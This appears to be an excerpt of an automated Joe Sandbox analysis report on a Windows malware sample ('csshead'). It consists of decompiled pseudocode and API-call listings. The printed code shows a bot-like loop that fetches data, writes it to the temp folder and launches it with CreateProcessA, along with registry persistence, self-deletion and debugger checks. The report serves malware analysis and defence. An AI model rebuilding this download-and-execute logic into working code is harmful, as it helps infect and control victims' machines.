    						E0040133C(_v40, _t157);
    						E00408258( &_v4253);
    						E0040133C(_v40,  &_v4253);
    						_t165 =  *0x40a0b8; // 0x401c78
    						E0040133C(_v40, _t165);
    						E0040133C(_v40, 0x408984);
    						_t170 =  *0x40a0c4; // 0x401c94
    						E0040133C(_v40, _t170);
    						_t174 =  *0x40c355; // 0x0
    						E00401864(_t174,  &_v4253);
    						E0040133C(_v40,  &_v4253);
    						_t317 = _t301 + 0x80;
    						__eflags = _v4382;
    						if(_v4382 != 0) {
    							E0040133C(_v40,  &_v4382);
    							_t317 = _t317 + 8;
    						}
    						_t179 =  *0x40a1bc; // 0x401ef8
    						E0040133C(_v40, _t179);
    						E00404154( &_v4253);
    						E0040133C(_v40,  &_v4253);
    						_t187 =  *0x40a0c8; // 0x401c9c
    						E0040133C(_v40, _t187);
    						_t301 = _t317 + 0x18;
    						_v8 = 0;
    						_v44 = GetTickCount();
    						__eflags = _v44 - 0x3a98;
    						if(_v44 < 0x3a98) {
    							__eflags = 0x3a98;
    							Sleep(0x3a98 - _v44);
    						}
    						_t195 = E004012DC(_v40);
    						_t198 =  *0x40c230; // 0x0
    						_t199 =  *0x40b784; // 0x0
    						_v12 = E00405D20(_t281, _t199 &  *0x40a074, _t198,  &_v156, 0x40b625, 0x40c355, _v40, _t195,  &_v16,  &_v20);
    						__eflags = _v12;
    						if(_v12 == 0) {
    							break;
    						}
    						_t289 =  *0x40a240; // 0x4020a8
    						_v36 = E00401110(_v16, _t289);
    						_v24 = _v16;
    						_t220 =  *0x40c355; // 0x0
    						 *0x40b64d = _t220;
    						 *0x40b780 = E00405468();
    						E00407474(0x40b61c, __eflags);
    						_t290 =  *0x40a1a8; // 0x401ecc
    						__eflags =  *_v24 -  *_t290;
    						if( *_v24 ==  *_t290) {
    							L21:
    							E00401440(_v16);
    							do {
    								_v48 = _v48 + 1;
    								Sleep(0x3e8);
    								_v52 = _v52 + 1;
    								_t228 =  *0x40b715; // 0x0
    								__eflags = _t228 - _v48;
    							} while (__eflags > 0);
    							continue;
    						}
    						_v56 = 0;
    						_v28 = 0;
    						_t291 =  *0x40a190; // 0x401e8c
    						_v28 = E00401110(_v24, _t291);
    						__eflags = _v28;
    						if(_v28 == 0) {
    							_t292 =  *0x40a18c; // 0x401e7c
    							_v28 = E00401110(_v24, _t292);
    						} else {
    							_v56 = 0xffffffff;
    						}
    						__eflags = _v28;
    						if(_v28 != 0) {
    							_v44 = _v28 - _v24;
    							_v28 = _v28 + 0xd;
    							_v36 = E00401110(_v28, E00408988);
    							_v32 = _v36 - _v28;
    							_t281 = _v32;
    							E004012B8( &_v4253, _v32, _v28);
    							 *((char*)(_t300 + _v32 - 0x1099)) = 0;
    							_v32 = E004010E0( &_v4253, _v28);
    							_t269 = _v36 + 2;
    							__eflags = _t269;
    							_v28 = _t269;
    							 *((char*)(_v24 + _v44)) = 0;
    						}
    						__eflags = _v56;
    						if(__eflags == 0) {
    							L19:
    							_t236 = E00407F20(_v24, _t281, 4);
    							__eflags = _t236;
    							if(_t236 != 0) {
    								E004080C0(_v56);
    								E00401440(_v40);
    								E00401440(_v16);
    								_push(0);
    								RtlExitUserThread();
    							}
    							goto L21;
    						} else {
    							_t281 = _v32;
    							__eflags = E004082F8(_v24, _v32, _v28, __eflags);
    							if(__eflags == 0) {
    								E00401440(_v16);
    								continue;
    							}
    							E004080C0(_v56);
    							E00401440(_v40);
    							E00401440(_v16);
    							_push(0);
    							RtlExitUserThread();
    							goto L19;
    						}
    					}
    					_t202 =  *0x40c355; // 0x0
    					_v4428 = _t202;
    					E00401308( &_v4424, 0x40c384);
    					_t205 =  *0x40b651; // 0x0
    					_t208 =  *0x40b784; // 0x0
    					_t281 =  *0x40b780; // 0x0
    					__eflags = E0040660C(_t208 &  *0x40a074, _t281, 0x40b625, __eflags, 0x40ba00,  &_v4428,  &_v4253, _t205);
    					if(__eflags != 0) {
    						E00401308(0x40b625,  &_v4253);
    						E00401308(0x40c254,  &_v4253);
    					}
    					 *0x40c355 = _v4428;
    					 *0x40b64d = _v4428;
    				}
    			}

    APIs
      • Part of subcall function 004013DC: GetProcessHeap.KERNEL32(00000000,?), ref: 004013EB
      • Part of subcall function 004013DC: RtlAllocateHeap.NTDLL(00000000), ref: 004013F2
    • Sleep.KERNEL32(00004E20), ref: 00408519
      • Part of subcall function 004064BC: GetVersionExA.KERNEL32(0000009C), ref: 00406530
      • Part of subcall function 00401864: wsprintfA.USER32 ref: 00401874
      • Part of subcall function 00404154: GetKeyboardLayoutList.USER32(00000009,?), ref: 00404169
    • GetTickCount.KERNEL32 ref: 004086EB
    • Sleep.KERNEL32(00003A98), ref: 00408706
      • Part of subcall function 00405468: GetSystemTime.KERNEL32(?), ref: 00405472
      • Part of subcall function 00407474: RegCreateKeyExA.ADVAPI32(80000002,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 0040750D
      • Part of subcall function 00407474: RegCreateKeyExA.ADVAPI32(80000001,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00407533
    • RtlExitUserThread.NTDLL(00000000), ref: 004088B6
      • Part of subcall function 004082F8: GetTempPathA.KERNEL32(00000201,?), ref: 00408364
      • Part of subcall function 004082F8: Sleep.KERNEL32(000005DC), ref: 004083E3
      • Part of subcall function 004082F8: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040840C
      • Part of subcall function 004082F8: wsprintfA.USER32 ref: 00408476
    • RtlExitUserThread.NTDLL(00000000), ref: 00408879
      • Part of subcall function 004080C0: RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 004080DB
      • Part of subcall function 004080C0: CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 004080E9
      • Part of subcall function 004080C0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00408106
      • Part of subcall function 004080C0: CloseHandle.KERNEL32(00000000), ref: 00408112
      • Part of subcall function 004080C0: SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 00408184
      • Part of subcall function 004080C0: SHDeleteKeyA.SHLWAPI(80000002,004021A4), ref: 004081BB
      • Part of subcall function 004080C0: SHDeleteKeyA.SHLWAPI(80000001,004021A4), ref: 004081FB
      • Part of subcall function 004080C0: ReleaseMutex.KERNEL32(00000000), ref: 00408221
      • Part of subcall function 004080C0: CloseHandle.KERNEL32(00000000), ref: 0040822D
      • Part of subcall function 004080C0: ExitProcess.KERNEL32 ref: 00408244
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
      • Part of subcall function 0040660C: Sleep.KERNEL32(000927C0), ref: 004066F5
      • Part of subcall function 0040660C: GetTickCount.KERNEL32 ref: 004066FD
      • Part of subcall function 0040660C: GetTickCount.KERNEL32 ref: 004067AF
      • Part of subcall function 0040660C: Sleep.KERNEL32(00001388), ref: 004067CD
      • Part of subcall function 0040660C: Sleep.KERNEL32(000493E0), ref: 004067F3
      • Part of subcall function 0040660C: Sleep.KERNEL32(000927C0), ref: 0040680F
    • Sleep.KERNEL32(000003E8), ref: 0040895F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
      • Part of subcall function 0042A0DF: Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100
    • __isleadbyte_l.LIBCMT ref: 0042B7B9
    • _strlen.LIBCMT ref: 0042B8D3
    • RtlDecodePointer.NTDLL(?), ref: 0042BA5D
    • RtlDecodePointer.NTDLL(?), ref: 0042BA89
    • RtlDecodePointer.NTDLL(?), ref: 0042BAAB
    • __aulldvrm.INT64 ref: 0042BC12
    • _write_string.LIBCMT ref: 0042BD55
    • _write_string.LIBCMT ref: 0042BE26
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
      • Part of subcall function 0042FF3F: __isleadbyte_l.LIBCMT ref: 0042FFA6
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,?,00000000,00000000,?,?,?,?,00422655), ref: 0042FFD7
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,00000001,00000000,00000000,?,?,?,?,00422655), ref: 00430045
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 95%
    			E0040660C(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				signed int _v20;
    				signed int _v24;
    				char _v28;
    				char _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				signed int _v44;
    				long _v48;
    				intOrPtr _v52;
    				char _v181;
    				char _v264;
    				char _v329;
    				char _v394;
    				intOrPtr _t116;
    				intOrPtr _t123;
    				signed int _t131;
    				signed int _t151;
    				intOrPtr _t154;
    				signed int _t155;
    				intOrPtr _t175;
    				intOrPtr _t195;
    				void* _t201;
    				void* _t202;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_v20 = 0;
    				E004064BC( &_v264, 0x51, __eflags);
    				_v36 = E00401110(_v12, E00406900);
    				_v40 = _v36 - _v12;
    				E004012B8( &_v329, _v40, _v12);
    				 *((char*)(_t201 + _v40 - 0x145)) = 0;
    				E00401308( &_v394,  &_v329);
    				_v44 = 1;
    				L1:
    				while(1) {
    					if(_v44 % 0x32 == 0 || _v44 == 1) {
    						L3:
    						_t184 = _a8;
    						_t116 =  *0x40a194; // 0x401e9c
    						_v24 = E00405AE8(_t116, _a8, 0);
    						if(_v24 == 0) {
    							Sleep(0x927c0);
    							goto L3;
    						}
    						_t123 =  *0x40c230; // 0x0
    						_v24 = E00405D20(_t184, _v8, _t123,  &_v264, _v12, _a8, 0, 0,  &_v28,  &_v32);
    						if(_v24 == 0) {
    							goto L7;
    						} else {
    							E00401440(_v28);
    							_v20 = 0;
    							goto L39;
    						}
    					} else {
    						L7:
    						_v48 = GetTickCount();
    						_t195 =  *0x40c230; // 0x0
    						E00406340( &_v329, 0x94, _t195, __eflags);
    						_v24 = 0;
    						_t131 = E00401110(_a4,  &_v329);
    						__eflags = _t131;
    						if(_t131 == 0) {
    							E00401308( &_v181,  &_v329);
    							E0040133C( &_v181, _v36);
    							_t202 = _t202 + 8;
    							_t175 =  *0x40c230; // 0x0
    							_v24 = E00405D20(0x94, _v8, _t175,  &_v264,  &_v181, _a8, 0, 0,  &_v28,  &_v32);
    						}
    						__eflags = _v24;
    						if(_v24 == 0) {
    							_v48 = GetTickCount() - _v48;
    							__eflags = _v48 - 0x1388;
    							if(_v48 < 0x1388) {
    								__eflags = 0x1388;
    								Sleep(0x1388 - _v48);
    							}
    							_v52 = E00405468();
    							__eflags = _v44 - 5;
    							if(_v44 != 5) {
    								L19:
    								__eflags = _v52 - _v16 - 0x3f480;
    								if(_v52 - _v16 >= 0x3f480) {
    									__eflags = _v52 - _v16 - 0x3f480;
    									if(_v52 - _v16 <= 0x3f480) {
    										L28:
    										__eflags = _v52 - _v16 - 0x7e900;
    										if(_v52 - _v16 <= 0x7e900) {
    											L33:
    											__eflags = _v52 - _v16 - 0xd2f00;
    											if(_v52 - _v16 > 0xd2f00) {
    												__eflags = _v44 - 0x12c;
    												if(_v44 != 0x12c) {
    													_t95 =  &_v44;
    													 *_t95 = _v44 + 1;
    													__eflags =  *_t95;
    												} else {
    													_v44 = 1;
    												}
    											}
    											L37:
    											__eflags = _v44 - 1;
    											if(__eflags == 0) {
    												E00401308( &_v329,  &_v394);
    											}
    											continue;
    										}
    										__eflags = _v52 - _v16 - 0xd2f00;
    										if(_v52 - _v16 >= 0xd2f00) {
    											goto L33;
    										}
    										__eflags = _v44 - 0xc8;
    										if(_v44 != 0xc8) {
    											_v44 = _v44 + 1;
    										} else {
    											_v44 = 1;
    										}
    										goto L37;
    									}
    									__eflags = _v52 - _v16 - 0x7e900;
    									if(_v52 - _v16 >= 0x7e900) {
    										goto L28;
    									}
    									__eflags = _v44 - 0x64;
    									if(_v44 != 0x64) {
    										_v44 = _v44 + 1;
    									} else {
    										_v44 = 1;
    									}
    									goto L37;
    								}
    								__eflags = _v44 - 0x32;
    								if(_v44 != 0x32) {
    									_v44 = _v44 + 1;
    								} else {
    									_v44 = 1;
    								}
    								goto L37;
    							} else {
    								__eflags = _v52 - _a16 - 0x927c0;
    								if(_v52 - _a16 >= 0x927c0) {
    									goto L19;
    								}
    								Sleep(0x493e0);
    								_t151 = E00405620();
    								asm("sbb eax, eax");
    								__eflags =  ~( ~_t151);
    								if( ~( ~_t151) == 0) {
    									while(1) {
    										_t154 =  *0x40a194; // 0x401e9c
    										_t155 = E00405AE8(_t154, _a8, 0);
    										asm("sbb eax, eax");
    										__eflags =  ~( ~_t155);
    										if( ~( ~_t155) != 0) {
    											goto L19;
    										}
    										Sleep(0x927c0);
    									}
    								}
    								goto L19;
    							}
    						} else {
    							E00401308(_a12,  &_v181);
    							E00401440(_v28);
    							_v20 = 0xffffffff;
    							L39:
    							return _v20;
    						}
    					}
    				}
    			}

    APIs
      • Part of subcall function 004064BC: GetVersionExA.KERNEL32(0000009C), ref: 00406530
    • Sleep.KERNEL32(000927C0), ref: 004066F5
    • GetTickCount.KERNEL32 ref: 004066FD
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    • GetTickCount.KERNEL32 ref: 004067AF
    • Sleep.KERNEL32(00001388), ref: 004067CD
      • Part of subcall function 00405468: GetSystemTime.KERNEL32(?), ref: 00405472
    • Sleep.KERNEL32(000493E0), ref: 004067F3
    • Sleep.KERNEL32(000927C0), ref: 0040680F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • SelectObject.GDI32(00000000,00000000), ref: 004147C8
    • PatBlt.GDI32(00000000,00000000,00000000,?,?,00FF0062), ref: 004147EA
    • GetSysColor.USER32(00000012), ref: 004147F2
      • Part of subcall function 00412B40: DeleteDC.GDI32(00000000), ref: 00412B8A
      • Part of subcall function 00412B40: DeleteDC.GDI32(?), ref: 00412C1F
      • Part of subcall function 00412B40: DeleteDC.GDI32(00000000), ref: 00412C22
      • Part of subcall function 00412B40: SelectObject.GDI32(00000000,00000000), ref: 00412C38
      • Part of subcall function 00412B40: SelectObject.GDI32(?,?), ref: 00412C53
      • Part of subcall function 00412B40: SelectObject.GDI32(00000000,?), ref: 00412CAE
      • Part of subcall function 00412B40: SelectObject.GDI32(?,?), ref: 00412CC4
      • Part of subcall function 00412B40: SetBkColor.GDI32(00000000,00808080), ref: 00412CF7
      • Part of subcall function 00412B40: SelectObject.GDI32(00000000,00000000), ref: 00412D5A
      • Part of subcall function 00412B40: SelectObject.GDI32(?,?), ref: 00412D69
      • Part of subcall function 00412B40: DeleteObject.GDI32(?), ref: 00412D77
      • Part of subcall function 00412B40: DeleteObject.GDI32(?), ref: 00412D89
      • Part of subcall function 00412B40: DeleteDC.GDI32(?), ref: 00412D9B
      • Part of subcall function 00412B40: DeleteDC.GDI32(00000000), ref: 00412DA6
      • Part of subcall function 00412B40: FillRect.USER32(?,?,?), ref: 00412DE0
      • Part of subcall function 00412B40: SelectObject.GDI32(?,?), ref: 00412DF1
      • Part of subcall function 00412B40: SelectObject.GDI32(?,?), ref: 00412E2D
      • Part of subcall function 00412B40: SelectObject.GDI32(?,?), ref: 00412E5D
      • Part of subcall function 00412B40: SelectObject.GDI32(?,00000000), ref: 00412E69
      • Part of subcall function 00412B40: SelectObject.GDI32(?,00000000), ref: 00412E75
      • Part of subcall function 00412B40: DeleteDC.GDI32(?), ref: 00412E82
      • Part of subcall function 00412B40: DeleteObject.GDI32(?), ref: 00412E8D
      • Part of subcall function 00412B40: DeleteDC.GDI32(?), ref: 00412E94
    • SelectObject.GDI32(00000000,?), ref: 0041485A
    • DeleteObject.GDI32(00000000), ref: 00414865
    • DeleteDC.GDI32(00000000), ref: 00414872
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E004082F8(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v541;
    				char _v1054;
    				struct _STARTUPINFOA _v1124;
    				struct _PROCESS_INFORMATION _v1140;
    				intOrPtr _t41;
    				intOrPtr _t57;
    				intOrPtr _t62;
    				intOrPtr _t66;
    				intOrPtr _t77;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_v20 = 0;
    				_v24 = E00407CFC(_v12);
    				E00401258( &_v1124, 0x44);
    				_v1124.cb = 0x44;
    				if(_v24 == 0) {
    					_t41 =  *0x40a168; // 0x401dec
    					E00407290(_t41);
    				} else {
    					_v28 = E00401110(_v8, 0x408494);
    					_t96 = _v28;
    					if(_v28 != 0) {
    						GetTempPathA(0x201,  &_v1054);
    						E00407560( &_v1054, 0x408494, _t96);
    						E00401308( &_v541, 0x40849c);
    						E0040133C( &_v541,  &_v1054);
    						E0040133C( &_v541, 0x40849c);
    						_t57 =  *0x40a0a8; // 0x401c4c
    						E0040133C( &_v541, _t57);
    						if( *((char*)(_v28 + 4)) != 0x31) {
    							 *0x40b514 = 0;
    							_t62 =  *0x40b510; // 0x0
    							E00401828(_t62);
    							E004013B4(0x40b510, _v16);
    							_t66 =  *0x40b510; // 0x0
    							E004012B8(_t66, _v16, _v12);
    							 *0x40b514 = _v16;
    							 *0x40be1c = 0;
    							wsprintfA("1530474054", 0x4084a0, _v24);
    						} else {
    							E0040485C( &_v1054, _v16, _v12);
    							Sleep(0x5dc);
    							if(CreateProcessA(0,  &_v541, 0, 0, 0, 0, 0, 0,  &_v1124,  &_v1140) == 0) {
    								_t77 =  *0x40a174; // 0x401e10
    								E00407290(_t77);
    							} else {
    								_v20 = 0xffffffff;
    							}
    						}
    					}
    				}
    				return _v20;
    			}

    APIs
    • GetTempPathA.KERNEL32(00000201,?), ref: 00408364
    • Sleep.KERNEL32(000005DC), ref: 004083E3
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040840C
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
      • Part of subcall function 004013B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD
    • wsprintfA.USER32 ref: 00408476
      • Part of subcall function 0040485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404886
      • Part of subcall function 0040485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004048A7
      • Part of subcall function 0040485C: FlushFileBuffers.KERNEL32(000000FF), ref: 004048C4
      • Part of subcall function 0040485C: CloseHandle.KERNEL32(000000FF), ref: 004048CE
      • Part of subcall function 00407290: CreateThread.KERNEL32(00000000,00000000,Function_00007278,?,00000000,?), ref: 004072AC
      • Part of subcall function 00407290: CloseHandle.KERNEL32(?), ref: 004072B9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
      • Part of subcall function 0042C08B: __amsg_exit.LIBCMT ref: 0042C0AD
      • Part of subcall function 0042C08B: RtlEnterCriticalSection.NTDLL(?), ref: 0042C0B5
    • RtlDecodePointer.NTDLL(0043CD38), ref: 00424524
    • RtlDecodePointer.NTDLL ref: 00424535
      • Part of subcall function 00425CFE: RtlEncodePointer.NTDLL(00000000), ref: 00425D00
    • RtlDecodePointer.NTDLL(-00000004), ref: 0042455B
    • RtlDecodePointer.NTDLL ref: 0042456E
    • RtlDecodePointer.NTDLL ref: 00424578
      • Part of subcall function 0042BFB2: RtlLeaveCriticalSection.NTDLL ref: 0042BFC1
      • Part of subcall function 004243C2: ExitProcess.KERNEL32 ref: 004243D3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 91%
    			E00408AA4(void* __edx, void* __eflags) {
    				struct _WNDCLASSEXA _v52;
    				struct tagMSG _v80;
    				char _v97;
    				void* _t14;
    
    				E00401164(E004010B4(E00401164(E004010B4(_t14, __edx),  &_v97),  &_v97),  &(( &_v97)[8]));
    				E00401258( &_v52, 0x30);
    				_v52.cbSize = 0x30;
    				_v52.hInstance = 0;
    				_v52.lpszClassName =  &_v97;
    				_v52.lpfnWndProc = E00408A48;
    				RegisterClassExA( &_v52);
    				 *0x40a574 = CreateWindowExA(0,  &_v97, 0, 0, 0x80000000, 0x80000000, 0x80000000, 0x80000000, 0, 0, 0, 0);
    				if( *0x40a574 != 0) {
    					while(GetMessageA( &_v80, 0, 0, 0) != 0) {
    						TranslateMessage( &_v80);
    						DispatchMessageA( &_v80);
    					}
    				}
    				_push(0);
    				return RtlExitUserThread();
    			}

    APIs
    • RegisterClassExA.USER32(00000030), ref: 00408AF1
    • CreateWindowExA.USER32(00000000,?,00000000,00000000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00408B1D
    • TranslateMessage.USER32(?), ref: 00408B37
    • DispatchMessageA.USER32(?), ref: 00408B41
    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00408B51
    • RtlExitUserThread.NTDLL(00000000), ref: 00408B5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • LoadLibraryA.KERNEL32(uxtheme.dll), ref: 00410C2D
    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 00410C46
    • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00410C58
    • FreeLibrary.KERNEL32(00000000), ref: 00410C67
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • CallWindowProcA.USER32(?,?,?,?,?), ref: 00414E8C
    • DeleteObject.GDI32(?), ref: 00414EE6
    • RtlEnterCriticalSection.NTDLL(00442B64), ref: 00414F07
    • GetCurrentThreadId.KERNEL32 ref: 00414F1A
    • RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00414F51
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00414F6A
    • UnhookWindowsHookEx.USER32(00000000), ref: 00414F93
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    • RtlLeaveCriticalSection.NTDLL(00442B64), ref: 0041500D
      • Part of subcall function 00412950: GetVersionExA.KERNEL32(?,00000000,00000030), ref: 004129A7
      • Part of subcall function 00412950: SetMenuItemInfoA.USER32(?,?,00000000,0000002C), ref: 004129F7
      • Part of subcall function 00412950: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00412A19
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • IsWindowEnabled.USER32(?), ref: 004121F0
    • GetFocus.USER32 ref: 004121FE
    • MessageBeep.USER32(00000000), ref: 00412304
      • Part of subcall function 00411010: SendMessageA.USER32(?,0000044E,?,?), ref: 00411023
    • MessageBeep.USER32(00000000), ref: 00412232
    • GetClientRect.USER32(?,?), ref: 0041225F
    • SendMessageA.USER32(?,0000041D,?,?), ref: 00412290
    • SendMessageA.USER32(?,00000417,?,?), ref: 004122BB
    • PostMessageA.USER32(?,00000100,00000028,00000000), ref: 004122E0
      • Part of subcall function 00410FF0: SendMessageA.USER32(?,00000448,?,00000000), ref: 00410FFF
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetCapture.USER32 ref: 00411DE7
    • ClientToScreen.USER32(?,?), ref: 00411E1D
    • GetWindowRect.USER32(?,?), ref: 00411E42
    • ReleaseCapture.USER32 ref: 00411E5E
      • Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 004113E3
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 00411412
    • PtInRect.USER32(?,?,?), ref: 00411EBD
    • SendMessageA.USER32(?,00000112,0000F020,000000FD), ref: 00411EE4
    • SendMessageA.USER32(?,00000112,0000F120,00000000), ref: 00411F07
    • SendMessageA.USER32(?,00000112,0000F060,00000000), ref: 00411F2A
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetMessagePos.USER32 ref: 00412389
    • WindowFromPoint.USER32(?,00000000), ref: 004123BB
    • ScreenToClient.USER32(?,?), ref: 004123CF
    • SendMessageA.USER32(?,00000445,00000000,?), ref: 004123E5
    • GetMenuItemCount.USER32(?), ref: 00412415
      • Part of subcall function 00410FD0: SendMessageA.USER32(?,00000417,?,?), ref: 00410FE2
    • PostMessageA.USER32(?,00000202,00000000,?), ref: 0041249F
    • PostMessageA.USER32(?,00000100,0000001B,00000000), ref: 004124AB
    • ScreenToClient.USER32(?,?), ref: 004124BF
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 00425D30: TlsGetValue.KERNEL32(00000000,00425E89,?,?,00417F96,00000009), ref: 00425D39
      • Part of subcall function 00425D30: RtlDecodePointer.NTDLL ref: 00425D4B
      • Part of subcall function 00425D30: TlsSetValue.KERNEL32(00000000,?,?,00417F96,00000009), ref: 00425D5A
    • ___fls_getvalue@4.LIBCMT ref: 00423C62
      • Part of subcall function 00425D10: TlsGetValue.KERNEL32(?,?,00423C67,00000000), ref: 00425D1E
    • ___fls_setvalue@8.LIBCMT ref: 00423C75
      • Part of subcall function 00425D64: RtlDecodePointer.NTDLL(?), ref: 00425D75
    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00423C7E
    • RtlExitUserThread.NTDLL(00000000), ref: 00423C85
    • GetCurrentThreadId.KERNEL32 ref: 00423C8B
